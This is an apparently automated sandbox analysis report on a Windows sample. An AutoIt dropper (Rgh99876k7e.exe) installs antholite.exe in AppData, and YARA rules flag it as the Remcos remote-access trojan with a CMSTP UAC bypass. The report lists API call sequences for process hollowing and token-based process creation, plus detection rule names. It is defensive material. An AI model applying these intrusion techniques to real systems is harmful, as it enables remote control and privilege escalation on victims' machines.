aritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3f8d1b51-7
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError | 2_2_0041812A
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle | 2_2_0041330D
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041D620 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA | 2_2_0041D620
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle | 2_2_0041BBC6
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle | 2_2_0041BB9A
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle | 3_2_0040DD85
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_00401806 NtdllDefWindowProc_W | 3_2_00401806
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_004018C0 NtdllDefWindowProc_W | 3_2_004018C0
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076D5EB: CreateFileW,DeviceIoControl,CloseHandle | 0_2_0076D5EB
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00761201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00761201
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_0076E8F6
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress | 2_2_004167EF
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 2_2_008FE8F6
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 3_2_008FE8F6
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00708060 | 0_2_00708060
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00772046 | 0_2_00772046
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00768298 | 0_2_00768298
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0073E4FF | 0_2_0073E4FF
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0073676B | 0_2_0073676B
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00794873 | 0_2_00794873
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0070CAF0 | 0_2_0070CAF0
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0072CAA0 | 0_2_0072CAA0
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0071CC39 | 0_2_0071CC39
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00736DD9 | 0_2_00736DD9
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0071B119 | 0_2_0071B119
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007091C0 | 0_2_007091C0
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00721394 | 0_2_00721394
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00721706 | 0_2_00721706
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0072781B | 0_2_0072781B
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0071997D | 0_2_0071997D
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00707920 | 0_2_00707920
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007219B0 | 0_2_007219B0
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00727A4A | 0_2_00727A4A
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00721C77 | 0_2_00721C77
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00727CA7 | 0_2_00727CA7
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0078BE44 | 0_2_0078BE44
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00739EEE | 0_2_00739EEE
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0070BF40 | 0_2_0070BF40
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00721F32 | 0_2_00721F32
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_02533610 | 0_2_02533610
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0043706A | 2_2_0043706A
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00414005 | 2_2_00414005
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0043E11C | 2_2_0043E11C
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004541D9 | 2_2_004541D9
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004381E8 | 2_2_004381E8
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041F18B | 2_2_0041F18B
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00446270 | 2_2_00446270
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0043E34B | 2_2_0043E34B
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004533AB | 2_2_004533AB
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0042742E | 2_2_0042742E
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00437566 | 2_2_00437566
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0043E5A8 | 2_2_0043E5A8
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004387F0 | 2_2_004387F0
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0043797E | 2_2_0043797E
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004339D7 | 2_2_004339D7
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0044DA49 | 2_2_0044DA49
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00427AD7 | 2_2_00427AD7
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041DBF3 | 2_2_0041DBF3
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00427C40 | 2_2_00427C40
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00437DB3 | 2_2_00437DB3
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00435EEB | 2_2_00435EEB
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0043DEED | 2_2_0043DEED
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00426E9F | 2_2_00426E9F
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00902046 | 2_2_00902046
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00898060 | 2_2_00898060
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008F8298 | 2_2_008F8298
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008CE4FF | 2_2_008CE4FF
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008C676B | 2_2_008C676B
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00924873 | 2_2_00924873
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008BCAA0 | 2_2_008BCAA0
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0089CAF0 | 2_2_0089CAF0
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008ACC39 | 2_2_008ACC39
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008C6DD9 | 2_2_008C6DD9
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008991C0 | 2_2_008991C0
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008AB119 | 2_2_008AB119
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B1394 | 2_2_008B1394
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B1706 | 2_2_008B1706
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B781B | 2_2_008B781B
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B19B0 | 2_2_008B19B0
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00897920 | 2_2_00897920
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008A997D | 2_2_008A997D
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B7A4A | 2_2_008B7A4A
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B7CA7 | 2_2_008B7CA7
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B1C77 | 2_2_008B1C77
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008C9EEE | 2_2_008C9EEE
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0091BE44 | 2_2_0091BE44
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008B1F32 | 2_2_008B1F32
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_10017194 | 2_2_10017194
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_1000B5C1 | 2_2_1000B5C1
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_010F3610 | 2_2_010F3610
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0044B040 | 3_2_0044B040
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0043610D | 3_2_0043610D
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_00447310 | 3_2_00447310
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0044A490 | 3_2_0044A490
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0040755A | 3_2_0040755A
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0043C560 | 3_2_0043C560
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044B6103_2_0044B610
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044D6C03_2_0044D6C0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004476F03_2_004476F0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044B8703_2_0044B870
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044081D3_2_0044081D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004149573_2_00414957
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004079EE3_2_004079EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00407AEB3_2_00407AEB
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044AA803_2_0044AA80
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00412AA93_2_00412AA9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404B743_2_00404B74
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404B033_2_00404B03
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044BBD83_2_0044BBD8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404BE53_2_00404BE5
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404C763_2_00404C76
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00415CFE3_2_00415CFE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00416D723_2_00416D72
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00446D303_2_00446D30
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00446D8B3_2_00446D8B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00406E8F3_2_00406E8F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_009020463_2_00902046
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008980603_2_00898060
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008F82983_2_008F8298
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008CE4FF3_2_008CE4FF
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C676B3_2_008C676B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_009248733_2_00924873
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008BCAA03_2_008BCAA0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0089CAF03_2_0089CAF0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008ACC393_2_008ACC39
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C6DD93_2_008C6DD9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008AAFAC3_2_008AAFAC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008991C03_2_008991C0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B13943_2_008B1394
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B17063_2_008B1706
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B781B3_2_008B781B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B19B03_2_008B19B0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008979203_2_00897920
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008A997D3_2_008A997D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B7A4A3_2_008B7A4A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B7CA73_2_008B7CA7
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B1C773_2_008B1C77
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C9EEE3_2_008C9EEE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0091BE443_2_0091BE44
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B1F323_2_008B1F32
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: String function: 0071F9F2 appears 40 times
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: String function: 00720A30 appears 46 times
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: String function: 00709CB3 appears 31 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 008C2FA6 appears 48 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 00402093 appears 50 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 008B0A30 appears 92 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 008B4963 appears 62 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 008B4A28 appears 42 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 008B8E0B appears 36 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 00899CB3 appears 62 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 00434801 appears 41 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 008AF9F2 appears 81 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 008D1F50 appears 53 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 00401E65 appears 35 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 0089988F appears 33 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 0089600E appears 34 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 00434E70 appears 54 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: String function: 00416760 appears 69 times
                  Source: Rgh99876k7e.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
